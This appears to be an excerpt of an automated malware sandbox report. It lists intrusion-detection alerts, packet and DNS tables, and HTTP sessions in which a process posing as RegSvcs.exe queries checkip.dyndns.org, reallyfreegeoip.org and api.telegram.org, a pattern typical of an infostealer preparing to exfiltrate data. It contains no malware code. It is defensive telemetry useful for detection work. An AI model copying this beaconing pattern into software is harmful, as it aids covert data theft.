                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                    2024-12-11T08:59:03.225723+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730132.226.247.7380TCP
                                                                                                                    2024-12-11T08:59:05.960090+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730132.226.247.7380TCP
                                                                                                                    2024-12-11T08:59:07.568512+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449732104.21.67.152443TCP
                                                                                                                    2024-12-11T08:59:09.039176+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449733132.226.247.7380TCP
                                                                                                                    2024-12-11T08:59:10.654855+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449734104.21.67.152443TCP
                                                                                                                    2024-12-11T08:59:16.914491+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449738104.21.67.152443TCP
                                                                                                                    2024-12-11T08:59:20.091991+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449742104.21.67.152443TCP
                                                                                                                    2024-12-11T08:59:23.246084+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449746104.21.67.152443TCP
                                                                                                                    2024-12-11T08:59:26.366616+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449750104.21.67.152443TCP

                                                                                                                    Network Port Distribution

                                                                                                                    TCP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Dec 11, 2024 08:59:01.318991899 CET4973080192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:01.438355923 CET8049730132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:01.438436031 CET4973080192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:01.438780069 CET4973080192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:01.557991028 CET8049730132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:02.743061066 CET8049730132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:02.747498989 CET4973080192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:02.866754055 CET8049730132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:03.171295881 CET8049730132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:03.225723028 CET4973080192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:03.676853895 CET49731443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:03.676884890 CET44349731104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:03.676959991 CET49731443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:03.788399935 CET49731443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:03.788418055 CET44349731104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:05.017215014 CET44349731104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:05.017308950 CET49731443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:05.021869898 CET49731443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:05.021879911 CET44349731104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:05.022135973 CET44349731104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:05.069487095 CET49731443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:05.069998980 CET49731443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:05.115344048 CET44349731104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:05.456480980 CET44349731104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:05.456541061 CET44349731104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:05.458766937 CET49731443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:05.473763943 CET49731443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:05.477065086 CET4973080192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:05.596426010 CET8049730132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:05.905229092 CET8049730132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:05.907561064 CET49732443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:05.907587051 CET44349732104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:05.907653093 CET49732443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:05.908054113 CET49732443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:05.908065081 CET44349732104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:05.960089922 CET4973080192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:07.117592096 CET44349732104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:07.119402885 CET49732443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:07.119416952 CET44349732104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:07.568540096 CET44349732104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:07.568597078 CET44349732104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:07.568716049 CET49732443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:07.569271088 CET49732443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:07.572292089 CET4973080192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:07.573467016 CET4973380192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:07.691858053 CET8049730132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:07.691920042 CET4973080192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:07.692750931 CET8049733132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:07.692815065 CET4973380192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:07.692929029 CET4973380192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:07.812321901 CET8049733132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:08.997108936 CET8049733132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:08.998626947 CET49734443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:08.998656034 CET44349734104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:08.998914957 CET49734443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:08.999166012 CET49734443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:08.999177933 CET44349734104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:09.039175987 CET4973380192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:10.208127975 CET44349734104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:10.209640026 CET49734443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:10.209667921 CET44349734104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:10.654881001 CET44349734104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:10.654947996 CET44349734104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:10.655009985 CET49734443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:10.655400038 CET49734443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:10.659502983 CET4973580192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:10.778765917 CET8049735132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:10.779094934 CET4973580192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:10.779278040 CET4973580192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:10.898581982 CET8049735132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:12.083074093 CET8049735132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:12.086447954 CET49736443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:12.086493015 CET44349736104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:12.086556911 CET49736443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:12.086863995 CET49736443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:12.086879015 CET44349736104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:12.132004976 CET4973580192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:13.296272039 CET44349736104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:13.298150063 CET49736443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:13.298171043 CET44349736104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:13.747071981 CET44349736104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:13.747144938 CET44349736104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:13.747179985 CET49736443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:13.747652054 CET49736443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:13.751039982 CET4973580192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:13.752188921 CET4973780192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:13.870907068 CET8049735132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:13.870965004 CET4973580192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:13.871474028 CET8049737132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:13.871541023 CET4973780192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:13.871773958 CET4973780192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:13.991030931 CET8049737132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:15.217556000 CET8049737132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:15.218832016 CET49738443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:15.218883991 CET44349738104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:15.218947887 CET49738443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:15.219239950 CET49738443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:15.219259977 CET44349738104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:15.272619963 CET4973780192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:16.429938078 CET44349738104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:16.431567907 CET49738443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:16.431596041 CET44349738104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:16.914542913 CET44349738104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:16.914613008 CET44349738104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:16.914658070 CET49738443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:16.915096045 CET49738443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:16.918487072 CET4973780192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:16.919570923 CET4974080192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:17.038155079 CET8049737132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:17.038239002 CET4973780192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:17.038877964 CET8049740132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:17.038954020 CET4974080192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:17.039071083 CET4974080192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:17.158272028 CET8049740132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:18.355011940 CET8049740132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:18.380641937 CET49742443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:18.380692005 CET44349742104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:18.380754948 CET49742443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:18.380983114 CET49742443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:18.381004095 CET44349742104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:18.397591114 CET4974080192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:19.606020927 CET44349742104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:19.607570887 CET49742443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:19.607592106 CET44349742104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:20.092021942 CET44349742104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:20.092088938 CET44349742104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:20.096698999 CET49742443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:20.099955082 CET4974080192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:20.099958897 CET49742443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:20.101028919 CET4974580192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:20.219691992 CET8049740132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:20.219796896 CET4974080192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:20.220288992 CET8049745132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:20.220626116 CET4974580192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:20.220731974 CET4974580192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:20.340003967 CET8049745132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:21.540848970 CET8049745132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:21.555983067 CET49746443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:21.556030989 CET44349746104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:21.556135893 CET49746443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:21.559952021 CET49746443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:21.559961081 CET44349746104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:21.598521948 CET4974580192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:22.801476002 CET44349746104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:22.810364962 CET49746443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:22.810391903 CET44349746104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:23.246098995 CET44349746104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:23.246160030 CET44349746104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:23.246345043 CET49746443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:23.246635914 CET49746443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:23.249793053 CET4974580192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:23.250830889 CET4974880192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:23.369596958 CET8049745132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:23.369657040 CET4974580192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:23.370132923 CET8049748132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:23.370198011 CET4974880192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:23.370296001 CET4974880192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:23.489583969 CET8049748132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:24.676857948 CET8049748132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:24.708775043 CET49750443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:24.708815098 CET44349750104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:24.708883047 CET49750443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:24.709135056 CET49750443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:24.709146976 CET44349750104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:24.725728989 CET4974880192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:25.920510054 CET44349750104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:25.931560993 CET49750443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:25.931595087 CET44349750104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:26.366636038 CET44349750104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:26.366678953 CET44349750104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:26.366781950 CET49750443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:26.368623018 CET49750443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:26.369898081 CET4974880192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:26.370985031 CET4975180192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:26.489792109 CET8049748132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:26.489953041 CET4974880192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:26.490550995 CET8049751132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:26.490622044 CET4975180192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:26.490787029 CET4975180192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:26.609956980 CET8049751132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:27.799544096 CET8049751132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:27.800764084 CET49752443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:27.800795078 CET44349752104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:27.800857067 CET49752443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:27.801089048 CET49752443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:27.801100016 CET44349752104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:27.850712061 CET4975180192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:29.038005114 CET44349752104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:29.045660019 CET49752443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:29.045684099 CET44349752104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:29.481811047 CET44349752104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:29.481861115 CET44349752104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:29.481914043 CET49752443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:29.482453108 CET49752443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:29.496918917 CET4975180192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:29.617921114 CET8049751132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:29.618794918 CET4975180192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:29.643451929 CET49753443192.168.2.4149.154.167.220
                                                                                                                    Dec 11, 2024 08:59:29.643487930 CET44349753149.154.167.220192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:29.643554926 CET49753443192.168.2.4149.154.167.220
                                                                                                                    Dec 11, 2024 08:59:29.644010067 CET49753443192.168.2.4149.154.167.220
                                                                                                                    Dec 11, 2024 08:59:29.644023895 CET44349753149.154.167.220192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:31.010685921 CET44349753149.154.167.220192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:31.010766029 CET49753443192.168.2.4149.154.167.220
                                                                                                                    Dec 11, 2024 08:59:31.014373064 CET49753443192.168.2.4149.154.167.220
                                                                                                                    Dec 11, 2024 08:59:31.014384031 CET44349753149.154.167.220192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:31.014611959 CET44349753149.154.167.220192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:31.015995026 CET49753443192.168.2.4149.154.167.220
                                                                                                                    Dec 11, 2024 08:59:31.063325882 CET44349753149.154.167.220192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:31.514045000 CET44349753149.154.167.220192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:31.514101028 CET44349753149.154.167.220192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:31.514194012 CET49753443192.168.2.4149.154.167.220
                                                                                                                    Dec 11, 2024 08:59:31.522144079 CET49753443192.168.2.4149.154.167.220
                                                                                                                    Dec 11, 2024 08:59:48.148422956 CET4973380192.168.2.4132.226.247.73

                                                                                                                    UDP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Dec 11, 2024 08:59:01.174084902 CET5137253192.168.2.41.1.1.1
                                                                                                                    Dec 11, 2024 08:59:01.312005043 CET53513721.1.1.1192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:03.234148979 CET5421253192.168.2.41.1.1.1
                                                                                                                    Dec 11, 2024 08:59:03.674097061 CET53542121.1.1.1192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:29.497351885 CET5417253192.168.2.41.1.1.1
                                                                                                                    Dec 11, 2024 08:59:29.641657114 CET53541721.1.1.1192.168.2.4

                                                                                                                    DNS Queries

                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Dec 11, 2024 08:59:01.174084902 CET192.168.2.41.1.1.10xd6e7Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 08:59:03.234148979 CET192.168.2.41.1.1.10x969cStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 08:59:29.497351885 CET192.168.2.41.1.1.10x9cceStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                    DNS Answers

                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Dec 11, 2024 08:59:01.312005043 CET1.1.1.1192.168.2.40xd6e7No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Dec 11, 2024 08:59:01.312005043 CET1.1.1.1192.168.2.40xd6e7No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 08:59:01.312005043 CET1.1.1.1192.168.2.40xd6e7No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 08:59:01.312005043 CET1.1.1.1192.168.2.40xd6e7No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 08:59:01.312005043 CET1.1.1.1192.168.2.40xd6e7No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 08:59:01.312005043 CET1.1.1.1192.168.2.40xd6e7No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 08:59:03.674097061 CET1.1.1.1192.168.2.40x969cNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 08:59:03.674097061 CET1.1.1.1192.168.2.40x969cNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 08:59:29.641657114 CET1.1.1.1192.168.2.40x9cceNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                    HTTP Request Dependency Graph

                                                                                                                    • reallyfreegeoip.org
                                                                                                                    • api.telegram.org
                                                                                                                    • checkip.dyndns.org

                                                                                                                    HTTP Packets

                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.449730132.226.247.73807508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 11, 2024 08:59:01.438780069 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Dec 11, 2024 08:59:02.743061066 CET321INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 11 Dec 2024 07:59:02 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Request-ID: 0073403c5298b954b0d1c39580ca7ffd
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
                                                                                                                    Dec 11, 2024 08:59:02.747498989 CET127OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Dec 11, 2024 08:59:03.171295881 CET321INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 11 Dec 2024 07:59:02 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Request-ID: 376c2ce2d6c3e1d8cb084aeabaaf09c0
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
                                                                                                                    Dec 11, 2024 08:59:05.477065086 CET127OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Dec 11, 2024 08:59:05.905229092 CET321INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 11 Dec 2024 07:59:05 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Request-ID: e24c0c9f92e6fec416f9dbc26e4f1dcd
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.449733132.226.247.73807508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 11, 2024 08:59:07.692929029 CET127OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
